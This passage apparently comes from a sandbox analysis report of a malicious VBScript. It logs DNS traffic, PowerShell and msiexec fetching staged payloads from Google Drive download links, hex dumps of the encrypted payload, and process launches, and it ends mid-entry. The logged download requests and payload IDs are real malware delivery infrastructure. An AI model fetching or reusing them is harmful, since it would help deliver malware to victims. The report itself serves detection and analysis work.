                                                                                  Mar 10, 2025 09:20:25.118346930 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.118449926 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.118464947 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.118505001 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.120398998 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.120445967 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.120461941 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.120501995 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.121815920 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.121875048 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.121959925 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.121995926 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.125276089 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.125334024 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.125432014 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.125468969 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.125484943 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.125525951 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.125593901 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.125633955 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.125642061 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.125686884 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.128724098 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.128771067 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.128777027 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.128812075 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.128834963 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.128869057 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.128879070 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.128916979 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.129071951 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.129115105 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.137902975 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.138076067 CET49698443192.168.2.6142.250.185.97
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 10, 2025 09:18:58.998698950 CET | 64457 | 53 | 192.168.2.6 | 1.1.1.1
Mar 10, 2025 09:18:59.007714033 CET | 53 | 64457 | 1.1.1.1 | 192.168.2.6
Mar 10, 2025 09:19:01.726605892 CET | 59195 | 53 | 192.168.2.6 | 1.1.1.1
Mar 10, 2025 09:19:01.734880924 CET | 53 | 59195 | 1.1.1.1 | 192.168.2.6
Mar 10, 2025 09:19:04.434381962 CET | 56864 | 53 | 192.168.2.6 | 1.1.1.1
Mar 10, 2025 09:19:04.441967010 CET | 53 | 56864 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 10, 2025 09:18:58.998698950 CET | 192.168.2.6 | 1.1.1.1 | 0x96c3 | Standard query (0) | Host_6637.6637.6637.657e | A (IP address) | IN (0x0001) | false
Mar 10, 2025 09:19:01.726605892 CET | 192.168.2.6 | 1.1.1.1 | 0x8626 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Mar 10, 2025 09:19:04.434381962 CET | 192.168.2.6 | 1.1.1.1 | 0xc717 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 10, 2025 09:18:57.477193117 CET | 1.1.1.1 | 192.168.2.6 | 0x8ecf | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Mar 10, 2025 09:18:57.477193117 CET | 1.1.1.1 | 192.168.2.6 | 0x8ecf | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Mar 10, 2025 09:18:59.007714033 CET | 1.1.1.1 | 192.168.2.6 | 0x96c3 | Name error (3) | Host_6637.6637.6637.657e | none | none | A (IP address) | IN (0x0001) | false
Mar 10, 2025 09:19:01.734880924 CET | 1.1.1.1 | 192.168.2.6 | 0x8626 | No error (0) | drive.google.com |  | 216.58.212.174 | A (IP address) | IN (0x0001) | false
Mar 10, 2025 09:19:04.441967010 CET | 1.1.1.1 | 192.168.2.6 | 0xc717 | No error (0) | drive.usercontent.google.com |  | 142.250.185.97 | A (IP address) | IN (0x0001) | false
                                                                                  • drive.google.com
                                                                                  • drive.usercontent.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49688 | 216.58.212.174 | 443 | 7424 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-10 08:19:03 UTC | 215 | OUT | GET /uc?export=download&id=1y_MU1IxtxQaDn_f65Cn0bF8Lf0XC8U0I HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                                  Host: drive.google.com
                                                                                  Connection: Keep-Alive
2025-03-10 08:19:04 UTC | 1610 | IN | HTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Mon, 10 Mar 2025 08:19:04 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1y_MU1IxtxQaDn_f65Cn0bF8Lf0XC8U0I&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-GpFBnqHciDUgwDF5L091kA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49689 | 216.58.212.174 | 443 | 7424 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-10 08:19:10 UTC | 97 | OUT | GET /uc?export=download&id=1y_MU1IxtxQaDn_f65Cn0bF8Lf0XC8U0I HTTP/1.1
                                                                                  Host: drive.google.com
2025-03-10 08:19:11 UTC | 1319 | IN | HTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Mon, 10 Mar 2025 08:19:10 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1y_MU1IxtxQaDn_f65Cn0bF8Lf0XC8U0I&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-odL5SafZupnfXuVMGHYlEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  2 | 192.168.2.6 | 49690 | 142.250.185.97 | 443 | 7424 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2025-03-10 08:19:12 UTC | 139 | OUT | GET /download?id=1y_MU1IxtxQaDn_f65Cn0bF8Lf0XC8U0I&export=download HTTP/1.1
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  2025-03-10 08:19:16 UTC | 5014 | IN | HTTP/1.1 200 OK
                                                                                  X-GUploader-UploadID: AKDAyIucMVonh-6XRrQz5cODhx_ublIzDViMUZZtV3O0Vp1upUl5ziDxEBlhLFn-fFxCxxMB
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Security-Policy: sandbox
                                                                                  Content-Security-Policy: default-src 'none'
                                                                                  Content-Security-Policy: frame-ancestors 'none'
                                                                                  X-Content-Security-Policy: sandbox
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Content-Disposition: attachment; filename="Cigarfabrikker.afm"
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Access-Control-Allow-Credentials: false
                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                  Accept-Ranges: bytes
                                                                                  Content-Length: 470504
                                                                                  Last-Modified: Mon, 10 Mar 2025 02:53:44 GMT
                                                                                  Date: Mon, 10 Mar 2025 08:19:15 GMT
                                                                                  Expires: Mon, 10 Mar 2025 08:19:15 GMT
                                                                                  Cache-Control: private, max-age=0
                                                                                  X-Goog-Hash: crc32c=BNVi9w==
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  3 | 192.168.2.6 | 49697 | 216.58.212.174 | 443 | 8184 | C:\Windows\SysWOW64\msiexec.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2025-03-10 08:20:17 UTC | 216 | OUT | GET /uc?export=download&id=179yeRSPIWYmvgjVo15SJW1KN3hF-txYZ HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  2025-03-10 08:20:18 UTC | 1610 | IN | HTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Mon, 10 Mar 2025 08:20:17 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=179yeRSPIWYmvgjVo15SJW1KN3hF-txYZ&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-nr-87Fm4ZRW1gaALH2aArw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  4 | 192.168.2.6 | 49698 | 142.250.185.97 | 443 | 8184 | C:\Windows\SysWOW64\msiexec.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2025-03-10 08:20:21 UTC | 258 | OUT | GET /download?id=179yeRSPIWYmvgjVo15SJW1KN3hF-txYZ&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  2025-03-10 08:20:24 UTC | 5023 | IN | HTTP/1.1 200 OK
                                                                                  X-GUploader-UploadID: AKDAyIst82Mt5ezJS3Zrm4uT2zQDIkYTyBmPG9EXAHD87t0LJpbyRfbHBSrYb6CTqyq0shSQlmfGnfs
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Security-Policy: sandbox
                                                                                  Content-Security-Policy: default-src 'none'
                                                                                  Content-Security-Policy: frame-ancestors 'none'
                                                                                  X-Content-Security-Policy: sandbox
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Content-Disposition: attachment; filename="qKdUnHotNCBXp148.bin"
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Access-Control-Allow-Credentials: false
                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                  Accept-Ranges: bytes
                                                                                  Content-Length: 498752
                                                                                  Last-Modified: Mon, 10 Mar 2025 02:51:36 GMT
                                                                                  Date: Mon, 10 Mar 2025 08:20:24 GMT
                                                                                  Expires: Mon, 10 Mar 2025 08:20:24 GMT
                                                                                  Cache-Control: private, max-age=0
                                                                                  X-Goog-Hash: crc32c=VZTmxw==
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close
                                                                                  Data Ascii: yT>XD}S|yqXN>v#@.?g4`r86fVir}I35$4nUXwoDm6{<~or5@)D7.,uhYI{.B\-?:NQ*3exx@GT+)J;[XD/=2VO
                                                                                  2025-03-10 08:20:24 UTC1378INData Raw: 0a b2 d0 05 35 5f b7 50 b2 74 10 6c 20 9a 1d 4a cf 37 69 4f 3e 94 80 ee 15 ab 83 0e 79 3b 7a ba 18 c8 e7 cd 2f 5d fd 86 4c cf 79 10 a8 77 67 d4 37 ee 6a d0 82 4c 6b d2 2d 98 8e 19 27 b8 38 98 b8 5b e6 b5 17 f0 51 55 ad b9 ba bb b3 59 fd 35 2d 60 bb ec 2b f0 8f 21 64 85 d8 68 4e 81 da 3e da de 51 56 26 d1 b0 a7 65 e7 76 d8 c7 57 06 eb 48 ad ee d6 a1 1d 46 26 3d d8 cd 1c 26 ff 4d 30 f8 61 7b dd 0d 7d 71 07 13 06 89 f3 57 16 63 05 8a 63 4d e7 5c a2 02 ee 06 95 6c 7e c4 70 6a f4 f0 4b 45 80 8f 48 78 fc e5 d6 40 b3 29 eb a2 16 67 d1 19 3b 43 a3 60 a4 d3 22 98 3b 2b 3d 54 25 eb ce 32 bf ba 12 a7 85 76 49 1b 62 ea 21 a8 78 4d 55 40 44 43 e3 d5 1d 13 f6 c9 78 05 a8 eb 51 e1 ce bb 52 50 f3 d0 04 6b c1 75 bd 63 81 c7 2a 65 71 23 59 65 6e fd 6b 6f d9 8b 55 65 0d 94
                                                                                  Data Ascii: 5_Ptl J7iO>y;z/]Lywg7jLk-'8[QUY5-`+!dhN>QV&evWHF&=&M0a{}qWccM\l~pjKEHx@)g;C`";+=T%2vIb!xMU@DCxQRPkuc*eq#YenkoUe
                                                                                  2025-03-10 08:20:24 UTC1378INData Raw: 03 50 94 21 d4 f2 68 eb 49 33 b5 c0 27 8c 99 39 9b 87 ee c7 08 9f 8b a6 68 8c 6d 56 9a 67 c5 14 7f 3a a3 91 41 0d 1a c0 9f f8 a3 d9 dc cb de 10 78 4f b3 20 d0 d9 dd c9 5c 04 48 44 9a cc 48 61 54 57 87 94 8b 52 06 65 03 8d 4c 2e b0 89 16 28 61 d9 0c 55 53 b6 38 6b 4d 8f db 4a 87 3c 59 e2 79 f1 79 2d 5d 59 49 bc 6e 43 37 02 9d 6b 80 20 55 e2 c8 a9 0d 94 b8 ce 83 dc e6 46 70 e1 fe e9 4e 89 aa 20 cc 6a e5 50 cb ea e0 cd ff 50 af 5e 91 c2 19 11 c7 79 95 97 bb ab 69 27 c9 c3 d9 23 c8 86 b5 5b fb ec e1 91 5f 24 7c 92 62 f7 14 50 3f a0 c7 96 58 4b 62 51 01 a7 1b 0d 47 e2 81 a5 71 a5 5b 1c b3 2c 16 ab 62 c6 16 c6 e2 3d 7a 07 03 c9 67 e5 08 2d bc 68 63 6a e4 67 ad d2 7a 2b 99 ab e6 87 a4 08 a4 72 4f 21 c6 b2 82 1b e7 53 01 a4 ad cb 6c 00 85 b7 e2 77 fa 2a eb 09 65
                                                                                  Data Ascii: P!hI3'9hmVg:AxO \HDHaTWReL.(aUS8kMJ<Yyy-]YInC7k UFpN jPP^yi'#[_$|bP?XKbQGq[,b=zg-hcjgz+rO!Slw*e
                                                                                  2025-03-10 08:20:24 UTC1378INData Raw: 86 e1 d1 96 9b 62 33 5b fc 09 70 7c c7 cc b3 8c 09 11 be 4b 6d 24 7d 39 30 99 0d a7 60 71 ef 85 8b fb 40 62 a3 d4 81 7f 7a c5 3d 58 07 bb 8b d3 88 67 01 d3 97 6c 0e 33 d1 a7 ad c6 d9 b7 d4 96 21 a1 d2 09 7e d3 b3 61 c1 ab e4 93 98 91 e9 b3 85 d0 6a b5 ca 11 f6 51 ad 92 62 93 2c 31 a6 1e 18 ce 45 de 96 1e f5 b7 6f 56 31 30 f7 36 71 d1 be a5 37 51 29 f8 eb b4 48 e9 f9 9c ab bc 53 ad a9 c0 d9 4e 34 d2 78 23 69 cf 54 07 f2 30 05 f3 15 4e 4c 78 fe 91 8e 9e 7f 00 c7 ed d8 2f 21 fe 5c b1 b9 97 5a d8 29 ff 98 54 69 d4 8d b0 21 cd b6 08 0e 32 3c 74 46 3a ce 8b 68 4e 83 60 4e 89 14 80 b8 19 4e 0e ce 35 40 92 7a 37 b4 91 b2 04 0d e2 03 9a 28 8e 08 c8 b0 bb 34 74 72 a4 b0 32 cf 28 f4 2e e1 29 0f 1b 29 4b a7 92 c3 02 70 4a d4 60 a0 31 b4 15 1a 7e 8c 91 b8 bd 4a 4b 1f
                                                                                  Data Ascii: b3[p|Km$}90`q@bz=Xgl3!~ajQb,1EoV106q7Q)HSN4x#iT0NLx/!\Z)Ti!2<tF:hN`NN5@z7(4tr2(.))KpJ`1~JK
                                                                                  2025-03-10 08:20:24 UTC1378INData Raw: 6e ec 62 2b b9 c0 98 be 4e 82 dc 78 1f bc bf cf d3 c1 a0 cb b5 80 ad 0e 9d 47 a5 95 b2 21 22 c4 2b f2 75 cc 90 e4 c8 f2 46 46 40 02 bf 2c fa 78 2a b3 10 53 5b 90 3c f5 0f 9d 62 c5 b6 57 e1 27 9e 20 26 a2 04 27 ad c2 dd 41 8c 89 7d fb f3 4c 0a d5 b1 ae dc a2 81 4a b9 8a 18 53 d8 94 81 ea 89 a5 84 e7 a2 3a 0b 19 13 b2 b4 bb d8 59 3b 94 a2 3d 22 ff b5 33 cb 64 22 da b7 4a 60 0f cf 36 89 6c 52 dc 84 6a 8e be 2f 67 77 82 25 cd ab a1 d2 40 56 8f ba 4d 99 37 df 38 42 bf 60 a5 15 40 ac 8f b5 63 d6 3b 70 6a c1 00 f7 55 4f 3d 80 df ac ff 47 92 e8 53 2f 6c 54 70 b8 3b e3 2d 04 f2 ea db ad 79 e2 62 51 99 b8 90 d3 91 46 19 e0 ea 7a 21 7e 7c 06 01 dd b9 b7 26 c0 52 99 f0 b2 c8 5a 9e 7f 2b ae 1d 75 75 24 b0 8c b1 23 54 aa 3b c8 7c c0 ad 3b fe cb a6 30 5f 2e 39 8c a6 a4
                                                                                  Data Ascii: nb+NxG!"+uFF@,x*S[<bW' &'A}LJS:Y;="3d"J`6lRj/gw%@VM78B`@c;pjUO=GS/lTp;-ybQFz!~|&RZ+uu$#T;|;0_.9
                                                                                  2025-03-10 08:20:24 UTC1378INData Raw: 33 69 05 1a 50 62 f1 d7 47 d4 b0 f8 25 25 21 bc 11 09 c4 b0 fd d7 d4 1e 0e 98 bf 4d ff 7d 4e 90 ff 09 50 70 ee 31 b1 84 71 c9 c7 d3 c8 b5 5f 3f 37 49 5b 7b 11 55 39 9a 52 38 54 04 aa 45 a1 70 9a 90 91 c5 59 d2 f9 61 e1 17 be 7c f4 f4 3f 04 1c 49 58 49 cc 01 30 03 8b 26 1b 9d 5a 0b b6 96 5b 13 52 04 22 aa 3d 83 85 d0 6e 2a a1 5d 0e 18 6b fb 93 a5 6f a7 3e 05 03 ee 35 68 3d c3 16 2c d0 6a 2c 8b 7d 89 5c 62 01 ff 21 06 1f 40 e4 6f 09 e7 35 27 d6 61 8e b7 b5 db be 85 5f 16 cf 4a a8 10 3f 8e 82 b4 84 d8 b2 e4 f3 69 e5 71 03 29 6a 63 c6 e5 4b ba f0 40 26 9b 02 b7 48 a9 56 ef 29 5e c7 2f c8 b9 90 a3 2d 52 b9 1e b3 cc f4 86 48 bc f1 6a 7d 6e 4c 65 ea 84 7c 72 fa 9f 65 9d 51 29 28 12 f2 73 8e 3a 12 cc 66 73 55 27 04 26 98 0d 8a 70 fe 1a 2d b4 15 65 ca c0 5c e3 97
                                                                                  Data Ascii: 3iPbG%%!M}NPp1q_?7I[{U9R8TEpYa|?IXI0&Z[R"=n*]ko>5h=,j,}\b!@o5'a_J?iq)jcK@&HV)^/-RHj}nLe|reQ)(s:fsU'&p-e\



                                                                                  Target ID:0
                                                                                  Start time:04:18:56
                                                                                  Start date:10/03/2025
                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CO894GOV2O25.vbs"
                                                                                  Imagebase:0x7ff76fd60000
                                                                                  File size:170'496 bytes
                                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:7
                                                                                  Start time:04:18:57
                                                                                  Start date:10/03/2025
                                                                                  Path:C:\Windows\System32\PING.EXE
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:ping Host_6637.6637.6637.657e
                                                                                  Imagebase:0x7ff734f90000
                                                                                  File size:22'528 bytes
                                                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:8
                                                                                  Start time:04:18:57
                                                                                  Start date:10/03/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff68dae0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:9
                                                                                  Start time:04:18:58
                                                                                  Start date:10/03/2025
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
